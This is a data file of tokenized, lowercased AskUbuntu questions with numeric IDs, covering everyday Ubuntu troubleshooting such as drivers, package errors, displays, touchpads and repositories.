/etc/apt/trusted.gpg.d/cairo-dock-team-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/cairo-dock-team-weekly.gpg -- keyring /etc/apt/trusted.gpg.d/caldas-lopes-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/cdekter-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/chris-lea-node_js-legacy.gpg -- keyring /etc/apt/trusted.gpg.d/claudiocn-slm.gpg -- keyring /etc/apt/trusted.gpg.d/cooperjona-nitrotasks.gpg -- keyring /etc/apt/trusted.gpg.d/costales-folder-color.gpg -- keyring /etc/apt/trusted.gpg.d/costales-unity-webapps-telegram.gpg -- keyring /etc/apt/trusted.gpg.d/danielrichter2007-grub-customizer.gpg -- keyring /etc/apt/trusted.gpg.d/deja-dup-team-testing.gpg -- keyring /etc/apt/trusted.gpg.d/diesch-testing.gpg -- keyring /etc/apt/trusted.gpg.d/dlech-keepass2-plugins.gpg -- keyring /etc/apt/trusted.gpg.d/dr3mro-personal.gpg -- keyring /etc/apt/trusted.gpg.d/ehoover-compholio.gpg -- keyring /etc/apt/trusted.gpg.d/flozz-flozz.gpg -- keyring /etc/apt/trusted.gpg.d/format-junkie-team-release.gpg -- keyring /etc/apt/trusted.gpg.d/fossfreedom-indicator-sysmonitor.gpg -- keyring /etc/apt/trusted.gpg.d/freyja-dev-unity-tweak-tool-daily.gpg -- keyring /etc/apt/trusted.gpg.d/gencfsm-ppa.gpg -- keyring /etc/apt/trusted.gpg.d/george-edison55-nitroshare.gpg -- keyring /etc/apt/trusted.gpg.d/n-muench-burg.gpg -- keyring /etc/apt/trusted.gpg.d/rednotebook-daily.gpg -- keyring /etc/apt/trusted.gpg.d/webupd8team-y-ppa-manager.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 40976eaf437d05b5 gpg : keyblock resource `/etc/apt/trusted.gpg.d/n-muench-burg.gpg ' : resource limit gpg : keyblock resource `/etc/apt/trusted.gpg.d/rednotebook-daily.gpg ' : resource limit gpg : keyblock resource `/etc/apt/trusted.gpg.d/webupd8team-y-ppa-manager.gpg ' : resource limit gpg : requesting key 437d05b5 from hkp server keyserver.ubuntu.com gpg : key 437d05b5 : `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' 26 new signatures gpg : total number processed : 1 gpg : new signatures : 26 ========================================================================== what do i do ? how did i fubar this ? any help will be greatly appreciated . the os seems to be working just fine , no issues on reboot , or using the os normally . any clue ?
502132	what is the default values of kmp_affinity variable ?	i was playing with the kmp_affinity variable in my program and forgot to back-up the previous value . now the performance of my c++ program has fallen to 50 % . can anybody tell me what is the default value of kmp_affinity ubuntu system . i tried setting it to blank but the performance is still low . my os details are as follows : ubuntu 12.04 lts processor intel 3rd gen core i5 3210m .
502137	modem appears as wired connection !	i ca n't connect to the internet as the modem ca n't be detected . it all started when i installed huawei mobile partner , then network manager started to recognize my modem not as broadband but as wired connection . what should i do ! ? i do n't want to do a clean install due to a network problem .
502139	ubuntu 14.04 shutting down when idle	i did a pc build a couple of weeks ago , installed ubuntu 14.04 , no problems . recently , i 've been doing some work that required that i leave the machine running some scripts over night . when i would come back , the machine would either : still be on , but the monitors would not wake from sleep , or the whole machine would be off . now , i 've been running the same scripts during the day , and been playing tf2 for hours while they ran . there were no problems . i have gone away for lunch , come back after 30mins and found the machine off . all the power settings are set to `` never shut down '' , and i 've no idea where else in the system to look if there is a shutdown command being sent when idle . i could say overheating , but the machine has had nothing running on it , and still shut down while i was away from it . any other posts i 've seen on askubuntu pertain to 2011 or before . any suggestions guys ?
502140	how to do i deploy openstack icehouse using juju ?	i have been able to successfully get openstack up and running . is there a place where i can get the icehouse openstack charms ?
502141	restore dead partition on hard disk	volume on which i had installed my ubuntu died . the other one ( 600gb ) is working good and i can write and delete . but i ca n't open `` partition 1 '' is there any way to restore it 's content ? http : //i065.radikal.ru/1407/c9/4deb70f2172d.png
502142	how to block a virtual part of a usb device with udev ?	i 've got microsoft sculpt ergonomic desktop ( keyboard+mouse ) . it 's a nice set but it creates problems for me as one of its parts in the system is a virtual joystick js0 . i 've got an advice to use udev rules and i 've tried disabling it with udev in different ways , but i 've failed : action== '' add '' , subsystem== '' input '' , bus= '' usb '' , id_path= '' pci-0000:00:1d.0-usb-0:1.5:1.2 '' options+= '' ignore_device '' action== '' add '' , subsystems== '' input '' , attr { idmodel } == '' microsoft速_2.4ghz_transceiver_v9.0 '' run+= '' /bin/sh -c 'for host in /sys/bus/usb/devices/usb* ; do echo 0 > $ host/authorized_default ; done ' '' action== '' add '' , attr { idvendor } == '' 045e '' , attr { idproduct } == '' 07a5 '' , run+= '' /bin/sh -c 'echo 1 > /sys/\ $ devpath/authorized ' '' here are the outputs : $ udevadm info /dev/input/js0 $ udevadm info -- attribute-walk /dev/input/js0 $ udevadm monitor ( remove/add ) please help me to remove this virtual joystick , it looks like i ca n't manage to do it with udev .
502144	gtk apps have incorrect formatting	after installing a broken gtk theme my gtk apps now look like this : i edited my user settings and root 's too but i ca n't get rid of this ugly theme . i think it added the theme to bashrc , etc . i checked my user 's and deleted it but nothing changed .
502145	prohibiting changing of home page and launcher	i want to be able to prohibit the change of the order of the icons in the launcher and from people changing the home page in firefox . is there a way to do this ? so far i figured out a way to do it so that when they change the desktop background when they reboot it will go back to the default background no matter what . can i use the same method for icons etc . if so how would i start the code ? code for background : gsettings set org.gnome.desktop.background picture-uri `` file : ///usr/share/backgrounds/ubuntu_1.jpg ''
502147	ca n't install honclient-3.4.3.sh	i 'm desktop user . my os running 32-bit ubuntu 14.04lts . the problem i 've run into is this : when i try to run the client in the terminal , using the command : sudo sh honclient-3.4.3.sh it gives me this : sh : 0 : ca n't open honclient-3.4.3.sh i 've gone through and made the file executable , but it still does n't work . same thing happens when i try : ./honclient-3.4.3.sh tried after making it executable double click it so it would open and i could run and install it but it opens as text document as it should n't . after these problem i still tryed to run honclient < ver > .sh for a past few days but nothing worked , tried almost everything i found in google , but failed , if anyone have any suggestions and/or know how to fix this problem pls reply . thanks .
502150	how do i install myself as owner in 14.04 ?	how do i install myself as owner ? the system keeps telling me i 'm not authorized . i put in my profile but that did n't seem to do anything .
502155	touchpad not workink ubuntu 14.04	i recently installed ubuntu 14.04 on my notebook , but i ca n't find a way to make my touchpad work . the system reads the hardware , but i ca n't use it . in `` system options '' the `` active touchpad '' icon is already selected . my laptop is a toshiba , with a synaptics touchpad . thank you very much !
502157	firefox questions	are there any optimized builds and/or processor specific builds of firefox , like swiftfox : http : //getswiftfox.com/ for ubuntu ? i 've been tweaking config like it 's my job , just like i did on that other os i just came over from , but still i want more performance . is there any way to preload firefox on ubuntu ? i know about the system preloader that 's available but there seems to be contention among the information i 've read ; some say use it , some say do n't ... ... .. the closest app to speedy fox i can find is the vacuum places extension , which i have n't used yet : https : //addons.mozilla.org/en-us/firefox/addon/vacuum-places-improved/ ? src=api thanks in advance for your replies , i look forward to your input .
502162	ubuntu 14.04 installer has an invisible cursor	when trying to install ubuntu via a bootable usb drive , the cursor is missing in the installer . it 's there for a few seconds , when loading it . but after that it 's gone , i have to click a few buttons but i ca n't without a cursor ! how do i fix this , since there is absolutely no terminal or options screen or anything like that ? thanks .
502163	can not access my second internal hdd 1tb on latest ubuntu	i just installed latest ubuntu x64 from usb . all was ok . installed on my win 8.1 with option `` replace your current windows with ubuntu '' . ( not dual boot with windows , ) my question : how to get in to my hdd to store files ? p.s . i am new to ubuntu . here is some info : mrk @ m : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0001b5e0 device boot start end blocks id system /dev/sda1 * 2048 968419327 484208640 83 linux /dev/sda2 968421374 976771071 4174849 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 968421376 976771071 4174848 82 linux swap / solaris warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00008000 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt disk /dev/sdg : 4043 mb , 4043308544 bytes 255 heads , 63 sectors/track , 491 cylinders , total 7897087 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004fb8d device boot start end blocks id system /dev/sdg1 * 2048 7897086 3947519+ c w95 fat32 ( lba ) mrk @ m : ~ $ sudo parted -l model : ata st500dm002-1bd14 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 496gb 496gb primary ext4 boot 2 496gb 500gb 4275mb extended 5 496gb 500gb 4275mb logical linux-swap ( v1 ) model : ata st31000520as ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 33.6mb 21.5gb 21.5gb primary raid 2 21.5gb 1000gb 979gb ntfs primary hidden , msftdata model : generic usb flash disk ( scsi ) disk /dev/sdg : 4043mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 4043mb 4042mb primary fat32 boot , lba mrk @ m : ~ $ i really do not understand yet what it means . just curious about : 21.5gb 1000gb 979gb ntfs primary hidden , msftdata i have very important files on my 1tb hdd , but i am able to format it . no function to mount or whatsoever to do with that hdd . i want to save it if there is a possibility of doing that . please help .
502166	monitor mode on broadcom 6.30.223.248 wl driver does not work	i am trying to use broadcom card for sniffing wireless frames . with 6.30.223.248 wl driver , when i try to configure monitor mode using echo 1 > /proc/brcm_monitor0 , system hangs . i am using ubuntu 12.04 version . i have broadcom bc94352 mini pcie card . i have tried on kernel 3.2 / 3.11 / 3.15 . system hangs with kernels 3.11 and 3.15 . with 3.2 though prism0 interface is created for monitor mode . i could not set any channels and most of the frames are malformed . any help ?
502167	two monitors - resolution not correct	i have two monitors that are exactly the same make and model but obviously with different inputs ... i am trying to get them working in ubuntu 14.04 . here is some output from a random command i found : $ xrandr screen 0 : minimum 320 x 200 , current 2304 x 1024 , maximum 32767 x 32767 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi1 connected primary 1280x1024+1024+0 ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1280x960 60.0 1152x864 75.0 1280x720 60.0 50.0 59.9 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 720x576 50.0 720x480 60.0 59.9 640x480 75.0 72.8 66.7 60.0 59.9 720x400 70.1 as you can see the vga1 input is n't picking up the correct resolution . is there any way i can force the resolution to be 1280x1024 . thanks .
502171	modify hosts file	has anyone used this method : http : //www.putorius.net/2012/01/block-unwanted-advertisements-on.html i tried per instructions . maybe i 'm too new to linux , it 's not working for me . while looking for etc/hosts i came across hosts.allow and hosts.deny . do i simply add doamains to the hosts.deny list ?
502173	how change command lines in midnight commander ?	i want to change midnight commander console size , but i do n't know why it 's not enable to change from the layout settings . please help me to do that . tnx .
502179	where is bitcoind package ?	i ca n't find bitcoind packages . # apt-cache search bitcoin bfgminer - multi-threaded multi-pool asic , fpga and gpu bitcoin miner cgminer - multi-threaded multi-pool bitcoin miner electrum - easy to use bitcoin client libblkmaker-0.1-0 - implementation of getblocktemplate protocol libblkmaker-0.1-dev - c implementation of getblocktemplate protocol - development files python-electrum - easy to use bitcoin client - python module what is the reason to remove bitcoind , but insert miners : cgminer , bfgminer ?
502183	eclipse not working if i launch tomcat	i recently installed ubuntu14.04 . now when i use eclipse and launch tomcat from it , eclipse hanges and then shutdown . is any body else facing this problem ?
502184	migration/0 , migration/1 high cpu usage after executing sudo service network-manager restart	i am using ubuntu 14.04 lts . i am having some problems with my wifi , as it gets disconnected with wifi hotspot automatically and wo n't connect until i restart my computer . i am using wifi driver iwl3945 . i thought if i just restart my network manager , then it may work . but when i did that , migration/0 & migration/1 just go so high on cpu usage , even my mouse goes sluggish . here is the image of top cmd : - top command image can anybody please help me ?
502185	how to connect to a casio fx-9750gii calculator	i 've got a casio fx-9750gii calculator , wich has a usb conection . when i conect it to my computer the system does not mount it as a storage device . when i run lsusb this is the return : root @ akerbeltz : ~ # lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 006 : id 04e8:6860 samsung electronics co. , ltd gt-i9100 phone [ galaxy s ii ] , gt-p7500 [ galaxy tab 10.1 ] bus 001 device 003 : id 0ac8 : c335 z-star microelectronics corp . bus 003 device 002 : id 07cf:6101 casio computer co. , ltd my cuestion is if it is possible to transfer programs ( .g1m ) to the calculator as is done in win tank you p.s . : sorry for my bad english
502192	my touch screen does n't work on xubuntu 14.04	i installed xubuntu ( 14.04 ) on a sam4s machine . it used to have windows xp , but now the touch screen does n't work . how can i fix it ? is there anyway i could possibly just use any kind of touchscreen driver ? and witch ones ?
502194	installed ubuntu mouse constanty clicking	i briefly tried ubuntu from a disk and it worked fine . then i got a new blank hdd and installed it and right from the registration section the mouse ( trackpad ) is constantly clicking . it makes it impossible to look at any settings as the menus just appear and dissapear straight away . i was hoping to upgrade is to a newer version of ubuntu but i ca n't get to any menus to update and i havent got a memory stick large enough for the newer versions to make a bootable usb stick . is there a fix for this mouse problem please ? it does it with the trackpad and also with a usb mouse . i currently have an unusable laptop i cant do anything with . thanks
502197	unable to scp files to ubuntu 14 with vagrant	i 'm trying to scp files from my machines desktop into my vagrant box but i seem to keep running into this error . ssh : connect to host 127.0.0.1 port 22 : connection refused lost connection i looked into my vagrant file and found this line : create a forwarded port mapping which allows access to a specific port # within the machine from a port on the host machine . in the example below , # accessing `` localhost:8080 '' will access port 80 on the guest machine . config.vm.network `` forwarded_port '' , guest : 80 , host : 8080 i 've tried running these commands and have gotten the following errors respectively : scp -p 80 nginx.conf xxxxx @ 127.0.0.1 : /etc/nginx/nginx.conf ssh : connect to host 127.0.0.1 port 80 : connection refused lost connection scp -p 8080 nginx.conf xxxxx @ 127.0.0.1 : /etc/nginx/nginx.conf ssh_exchange_identification : connection closed by remote host lost connection i 've tried running these commands but it still does n't work either . sudo apt-get install openssh-client sudo apt-get install openssh-server any help would be appreciated .
502199	how to get the gtk-config script in ubuntu 14.04 ?	i want to build avscan 5.1.1 ( http : //linux.softpedia.com/get/security/avscan-3636.shtml , project page is down , does n't seem to be maintained any longer , but this should not be an issue and rather be considered an example for the more general question ) which requires/complains about missing gtk-config . how can i get it for ubuntu 14.04 ? i remember having crashed one ubuntu system and several vms due to gtk installations , so stability of the system before and after the installation of packages/from source is important and should be approx . the same : )
502200	how do i install a gui for my ubuntu server 14.04 ?	i installed ubuntu server 14.04 lte , but i want a lightweight gui , as it makes easier things for me . how can i do that ? which one do you recommend ?
502201	how do i block ads in firefox	i have seen this question , which has some detail on how to block ads in chrome/chromium ? is there anything i could use to block ads ( and trackers as well ) in firefox ?
502203	ca n't print web pages ( 12.04 ) hplip installed	the printer is and hp 2540 aio . it prints test pages fine , photos , docs , but not web prints . i 've attempted to print emails , articles , and return address labels and it will print portions of the page like some links or lines but not the text or images . i 've updated the hplip solution to no avail . i ca n't print from any browsers .
502204	kubuntu 14.04 usb headset not working	i have a pair of afterglow headphones that work fine on my ubuntu laptop but not my kubuntu desktop . it 's seen in cat /proc/asound/cards , but not lsusb . it shows up as a playback device under kde mixer , but no sound comes through when playing youtube videos off firefox . output of cat /proc/asound/cards : 0 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xfeb40000 irq 16 1 [ device ] : usb-audio - pdp audio device performance designed products pdp audio device at usb-0000:00:10.1-1 , full speed` output of lsusb : bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 058f:6362 alcor micro corp . flash card reader/writer bus 002 device 006 : id ffc0:0040 bus 002 device 005 : id 040b:2000 weltrend semiconductor bus 002 device 002 : id 058f:6254 alcor micro corp. usb hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 0a5c:217d broadcom corp. hp bluethunder bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 004 : id 0781:5575 sandisk corp . bus 008 device 003 : id 0e6f:010c logic3 bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 006 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
502206	weird behavior of copyq top panel icon ?	i use copyq as my clipboard manager and it works fine , but whenever i try to cleaned my system using bleachbit ( as normal user ) top bar icon changes like below image and most of time when i click that copyq icon it open briefly and then close . i tried using different themes /icon themes and also i removed copyq and re installed it . no any luck , what is this problem and how do i solve this ? thanks . ubuntu 14.04 copyq clipboard manager v2.2.0 ( hluk @ email.cz ) built with : qt 4.8.6 , libqxt 0.7.0
502207	ubuntu 14.04 problem with gstreamer1.0-libav	suddenly my ubuntu stopped to play video . when i open video , player suggests to install gstreamer1.0-libav . and it fails to install . i did try it manually , here is an error message : sudo apt-get install gstreamer1.0-libav reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gstreamer1.0-libav : depends : libavcodec54 ( > = 6:9.1-1 ) but it is not going to be installed or libavcodec-extra-54 ( > = 6:9.13 ) but it is not going to be installed depends : libavformat54 ( > = 6:9.1-1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
502210	lightweight pdf/djvu viewer with history navigation and that remembers last view on close	what 's a lightweight pdf/djvu viewer for ubuntu , that has the following two features : history navigation ( back/forward ) . remember view settings for each document ( last page , zoom , etc ) after closing the document .
502211	is there a gedit plugin that will detect errors in php code ?	i dont know if this is even possible inside of gedit , i know there are third party editors that will do this but i like gedit and would like to know if anyone knows of such a plugin because i cant find one .
502212	ubuntu 14.04 64 very slow on virtualbox	does anyone have an idea why ubuntu runs so slow on virtualbox ? i have installed other distros which run fine . i am running it on a mac 10.7 . thanks in advance for anyone 's help .
502215	applying password with command in terminal	is there an option to apply a password with the command in the terminal ? somethhing like : sudo some-command -pass=mypass i 'm just curious , i know that this is not safe .
502217	xfce disabling tooltips	i 'm running xubuntu 14.04 . while tooltips are the bane of my existence , i have questions about disabling them . i have launcher 's tooltips disabled in the panel because there 's obviously a setting for this . the only thing i keep reading about disabling tooltips is a kind of bulk disable and the script breaks drag and drop , so that 's not an option for me . i also read something on here about using compizconfig but i installed the program , it shows as installed in software center and synaptic , but i ca n't get it to execute . anyway , to stay on point , is there any way to disable tooltips for anything besides launchers , for example the hover over tips for open apps in the panel ? i have n't used any scripts ; the one i keep coming across is the one that breaks drag and drop . any input here will be greatly appreciated .
502224	dash wo n't launch applications after upgrade to 14.04	i just upgraded to 14.04 from 12.04 lts and now dash finds apps , but i ca n't launch them . it seems to hang - but the system does n't freeze or crash . any help would be appreciated .
502225	run command do n't run command line programs	in unity there is some menu called `` execute a command '' , which could be run by shortcut alt + f2 . it is working fine only when i try to use it to run gui programs like e.g . gedit . it is completely not working when i put command which try run command line program like : vim test.txtafter that there is no error message simply nothing happen . it is some bug or some `` feature '' ? how could i run command line programs inside ubuntu/unity without running `` terminal '' ?
502227	skype 4.2 wo n't launch on lenovo y510p ubuntu 14.04	i try and install skype 4.2 from the synaptic package center and it says installed but when i try to run it nothing happens . i 've tried both the skype : i386 and the regular skype with the binary files installed . i tried reinstalling , installing through terminal , installing through software center , and it just never runs . output below is from when i ran dpkg -l skype desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii skype 4.2.0.11-0ub i386 client for skype voip and instant
502228	monitor tcp port in background as daemon	a little background : i 'm in charge of a fairly old ( 10.04 ) web server that hosts lots of outdated , under-maintained sites running on out-of-date versions of platforms like wordpress , drupal , and joomla . for various reasons , most of these sites wo n't see security updates in the near future . my task is to minimize the damage that happens when a site gets compromised ( which happens often ) . the environment is set up such that different sites ca n't touch each other 's files , and this protection appears to be working ; once infected , a site has never been able to infect a neighboring site on the server . the main issue we 're having is email spam . there 's no smtp daemon running on the server , and php 's mail function is disabled , but infected sites are still managing to send mail directly using smtp . there are legitimate sites on the server that need to send emails via smtp , so simply shutting off port 25 in the firewall is n't an option . my question : i can use the following command to sniff out emails sent over smtp as they happen : tcpdump -i eth2 port 25 -x -a -s0 using the output of this command , i can hunt down the site sending spam , find the script sending it , and clean it out . i 'd like to have something like this running in the background 24/7 to watch for symptoms of new infections . should i simply run this command within a screen session and have it output to a logfile ? is there a bater way to run tcpdump in the background ? is there some other tool that is better suited to monitoring smtp traffic ? again , re-infections are almost guaranteed to occur , and for policy reasons out of my control there 's not much i can do about it . some months down the road this server is probably going to be decommissioned altogether , but in the meantime it would be nice to keep our ip out of the blacklists . a simple , temporary band-aid is all i 'm looking for here .
502230	file manager in xfce	in file manager in xfce , i 'd like to disable tooltips if there 's a way . also , in file manager preferences > behavior > middle click , open in new tab or new window is broken , it does n't matter which i select , the behavior is the same , folders and files not opening in a new window or new tab , only the current window . please help .
502233	error in ./configure	i have a problem in ./configure , please help : checking for cairo ... no configure : error : package requirements ( cairo > = 1.2.0 librsvg-2.0 > = 2.14.0 ) were not met : no package 'cairo ' found no package 'librsvg-2.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables cairo_cflags and cairo_libs to avoid the need to call pkg-config . see the pkg-config man page for more details .
502236	power button wo n't work after updates on my eee pc 12.04 and 14.04	i have an asus eee pc 1201ha , and i installed ubuntu 12.04 on it . i had no problems until i did some updates on it . the power ceased to work after that , as in if i pressed the power button , the dialog would not pop up . also , if it is suspended , i ca n't wake , with the power button or the keyboard . that , and some other problems that started to occur led me to reinstall ubuntu , but this time it was xubuntu 14.04 . it was working fine until , again , i did some updates and the power button was n't working as it should . any help ?
502239	how can i recover files from a fat disk image in their original locations ?	i had an mp3 player that deleted most of its files . i created an 8gb image file with dd right away . i looked at and tried to use some of the recovery software , but they just give me a bunch of files , usually unnamed and not in the right place in the tree . some of them did n't work with image files . what programs can i use to recover the deleted files so i can copy them directly to the drive ?
502248	cd root access denied	i have set up my root password but when i try and cd to root dir i get : bash : cd : root : permission denied the exact command is : cd root sorry i was unclear but the issue is resolved now thanks a lot everyone.=d
502249	i setup dvd playback a few months ago , with only a few issues , but it 's working	i set-up dvd playback a few months ago , with only a few issues , but it was working . now dvd 's wont play any more ( i only get audio , no video ) , and i tried installing packages and all the other stuff . i 'm using ubuntu 12.04 . update : after looking around , all i needed to do was to change a setting . now videos are playing . but i 'm still having a problem with the video quality . where ever the sun shines on any one or thing . the picture looks over exposed . i still do n't know for sure what 's wrong . can any one help ? here is a sample : i 'd put some pictures here , but this site wont let me . if you want to see them let me know . maybe i can email them to anyone that would like to see them .
502251	how do i enable amd turbo core the cpu on my acer aspire 7560 ?	i have an acer aspire 7560 that on windows supported ( through acer proprietary software ) boosting the cpu from 1.9ghz to up to 2.5ghz for long periods of time so long as there was adequate cooling . on ubuntu , i get a top speed of 1.9ghz no matter what i do . i am not trying to overclock past what it is supposed to go , but basically how would i go about doing this ? i have googled everywhere and everyone recommends using the bios and that if there is n't an option there it ca n't be done . i know it can , i know it can be done and still be stable on this computer , and i know that it is possible to do through simple software . my processor is an amd fusion a8-3520m quad-core 64 bit processor with integrated radeon graphics and 4gb of ram . thanks in advance .
502252	using unattended-upgrades or cron for automatically updating packages from different sources ?	i 'm running ubuntu 14.04 + xbmc on a htpc and now i want to setup automatic updates on this machine . on top of the normal ubuntu sources , i have also 3 other sources installed , of which i want to receive automatic updates : 1 ) the xbmc ppa ( http : //ppa.launchpad.net/team-xbmc/ppa/ubuntu/ ) 2 ) the steam source ( http : //repo.steampowered.com precise/steam ) 3 ) the flirc source ( http : //apt.flirc.tv binary/ ) i have already read about the unattended-upgrades package , but i do n't know how to modify this package to also download updates for xbmc , steam & flirc ( i 've read something about reading the lists file in /var/lib/apt/lists , but unfortunately , i could n't find source and origin defined in these lists ) . or is it better for me to go the cron route for this ?
502254	is the command `sudo rm /desktop/filename` safe ?	is this safe to use ? sudo rm /desktop/filename the reason for wanting to use sudo is i ca n't see the file . i accidentally typed in sudo rm /desktop/index.html . it did n't find it but could something still have been deleted ?
502259	how to disable tapping on touhpad hardware buttons	i have an dell inspiron , where the hardware buttons are part of the touchpad . in my old laptop i used to have one finger touched on the left button ( not clicked , but the finger was on the button ) . with one finger i moved over the touchpad and when i wanted to click i pressed stronger with the finger on the left button . with my new touchpad , i can not do that , because it knows that the finger is on touchpad , and it wants to do some functionality with two fingers . is there any possibility how to turn this touch one on the hardware button ? i played a little with sysclient . i tried this : synclient areabottomedge=3600 which successfully disabled my motion over hardware buttons , but the touchpad still knows that the finger is there .
502261	unity command runner	i 'm searching for command runner for unity . i known that there is default runner under shortcut alt + f2 . but as it was explained in that question run command do n't run command line programs it do n't allow to run command lines programs without adding some prefixes to command . in short i 'm searching for command runner which : has auto completion has history of last used commands allow to run both commands vim test.txt or gedit test.txt without any prefixes , suffixes etc . if command line program was run , terminal window should be closed after exiting program from different command runners i check gmrun , but it do n't have auto completion or history . in other hand xfrun4 as it is described in xfce4 alt f2 - xfrun4 command impotent in 14.04 trusty require some â ! â prefix to work . do you known some command runner which could be integrated with unity and meet that requirements ?
502263	hash sum mismatch when installing spotify on 14.04	i 'm trying to install spotify for ubuntu 14.04 . i add the repo and accept the spotify server key using sudo add-apt-repository 'deb http : //repository.spotify.com stable non-free' sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 however , when i try to update my repos using sudo apt-get update , i get the following error : w : failed to fetch gzip : /var/lib/apt/lists/partial/repository.spotify.com_dists_stable_non-free_binary-amd64_packages hash sum mismatch any idea why this is and how it can be fixed ? thank you !
502265	how to make a trial of ubuntu ?	hello i 've created my own distribution based on ubuntu , and i would like to know how to go about creating a trial for the operating system , for example users can download the trial and use the operating system for like 10 days and then it expires and they have to download the full version . how could i possible do this ?
502268	how to overwrite windows 7 with ubuntu on hp mini 110-3100	my hp mini 110-3100 does not have disc drive . it has windows 7 ultimate on it . i want to overwrite the windows 7 with ubuntu 14.04 i386 but each time i run the wubi installer , it will stop at initrimfs . please i need to make this system linux system urgently . i have tried virtual using virtual imaging software still it did not work . please help me .
502273	graphical glitch when logging in	every i log in , this pops up for a few seconds . it is n't that big of an issue but it 's annoying . also , my screen occasionally jumps up and down and sometimes flashes . this does not happen in windows 7 . i have an hd 7950 and the drivers are updated through the software update . i 'm a bit new to ubuntu .
502275	install mysql to non-system drive ?	is it possible to install mysql to a different drive than the system drive ? if so , how ? if i do something like the following , mysql will be installed on the system drive . sudo apt-get install mysql-server mysql-client i know that i can move the data to another drive , but i want to install mysql itself on a different drive .
502279	computer issues ! ubuntu 12.04lts	my computer shuts down unexpectedly and randomly . it 's been happening recently . it also will not shut down manually or when i click on shut down . i 've tried holding the power button for a long time and nothing . also , when i try to start up my computer i have to press the power button a few times and pray it will turn on . eventually , it does turn on and it shuts down fine most of the time . any idea what the issue could be ?
502280	what happened to ubuntu 's hall of fame page ?	once upon a time ( 2008 - ? ? ? ? ) ubuntu had a hall of fame page ( then located at http : //hall-of-fame.ubuntu.com ) in which it would give credits to contributors such as developers who patched a bug in the one hundred papercuts project or the top weekly contributors right here on askubuntu . you can see jono bacon 's blog post about it here . some time since the last contribution to its launchpad repository in 2011 and now it was removed from the website completely ( dns record for hall-of-fame.ubuntu.com removed ) . extensive googling has yielded no answers in any form . the the last snapshot of the site by web.archive.org reveals no clues , either ( it looks perfectly normal , and then there are no more snapshots ) . so i 'm curious- why was it removed ?
502286	how to add 4 to 9 repository urls in one repository with custom name ?	below are some repository ubuntu main repos deb http : //us.archive.ubuntu.com/ubuntu/ trusty main deb-src http : //us.archive.ubuntu.com/ubuntu/ trusty main and i need to do all above repo 's in one repo like deb http : /github.com/abclinux/ abclinux main so if i going to update my system only one repo exist in my /etc/apt/sources.list deb http : /github.com/abclinux/ abclinux main and during update use all above repository how ?
502292	ca n't install long tail pro on 12.04 using abobe air	i 'm having trouble installing long tail pro with adobe air . adobe air is installed correctly and works with other program , but with long tail pro i get this error message : sorry an error occurred this application requires an update to adobe air that is not available for your system . please view the system requirements for adobe air and update your system accordingly . help please .
